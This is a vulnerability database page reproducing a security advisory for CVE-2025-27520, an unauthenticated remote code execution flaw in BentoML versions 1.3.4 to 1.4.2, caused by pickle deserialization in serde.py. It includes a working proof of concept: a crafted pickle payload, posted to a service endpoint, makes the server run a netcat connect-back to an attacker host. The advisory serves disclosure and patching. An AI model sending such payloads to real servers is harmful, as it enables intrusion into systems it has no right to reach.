Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-33xw-247w-6hmc

Опубликовано: 04 апр. 2025
Источник: github
Github: Прошло ревью
CVSS3: 9.8

Описание

BentoML Allows Remote Code Execution (RCE) via Insecure Deserialization

Summary

A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version(v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server.

Details

It exists an unsafe code segment in serde.py:

def deserialize_value(self, payload: Payload) -> t.Any: if "buffer-lengths" not in payload.metadata: return pickle.loads(b"".join(payload.data))

Through data flow analysis, it is confirmed that the payload content is sourced from an HTTP request, which can be fully manipulated by the attack. Due to the lack of validation in the code, maliciously crafted serialized data can execute harmful actions during deserialization.

PoC

Environment:

  • Server host:
    • IP: 10.98.36.123
    • OS: Ubuntu
  • Attack host:
    • IP: 10.98.36.121
    • OS: Ubuntu
  1. Follow the instructions on the BentoML official README(https://github.com/bentoml/BentoML) to set up the environment.

1.1 Install BentoML (Server host: 10.98.36.123) : pip install -U bentoml

1.2 Define APIs in a service.py file (Server host: 10.98.36.123) :

from __future__ import annotations import bentoml @bentoml.service( resources={"cpu": "4"} ) class Summarization: def __init__(self) -> None: import torch from transformers import pipeline device = "cuda" if torch.cuda.is_available() else "cpu" self.pipeline = pipeline('summarization', device=device) @bentoml.api(batchable=True) def summarize(self, texts: list[str]) -> list[str]: results = self.pipeline(texts) return [item['summary_text'] for item in results]

1.3 Run the service code (Server host: 10.98.36.123) :

pip install torch transformers # additional dependencies for local run bentoml serve

  1. Start nc listening on the attacking host (Attack host: 10.98.36.121) : nc -lvvp 1234

  2. Send maliciously crafted request (Attack host: 10.98.36.121) :

import pickle import os import requests headers = {'Content-Type': 'application/vnd.bentoml+pickle'} class Evil: def __reduce__(self): return(os.system, ('nc 10.98.36.121 1234',)) payload = pickle.dumps(Evil()) requests.post("http://10.98.36.123:3000/summarize", data=payload, headers=headers)
  1. Attack success (Attack host: 10.98.36.121) : The server host(10.98.36.123) has connected to the attacker's host(10.98.36.121) listening on port 1234. nc

Impact

Remote Code Execution (RCE).

Ссылки

Пакеты

Наименование

bentoml

pip
Затронутые версииВерсия исправления

>= 1.3.4, < 1.4.3

1.4.3

EPSS

Процентиль: 99%
0.75707
Высокий

9.8 Critical

CVSS3

CVE ID

CVE-2025-27520

Дефекты

CWE-502

Связанные уязвимости

nvd логотип

CVE-2025-27520

CVSS3: 9.8
nvd
10 месяцев назад

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version (v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server. It exists an unsafe code segment in serde.py. This vulnerability is fixed in 1.4.3.

fstec логотип

BDU:2025-04881

CVSS3: 9.8
fstec
10 месяцев назад

Уязвимость компонента serde.py библиотеки BentoML, позволяющая нарушителю выполнить произвольный код на сервере

EPSS

Процентиль: 99%
0.75707
Высокий

9.8 Critical

CVSS3

CVE ID

CVE-2025-27520

Дефекты

CWE-502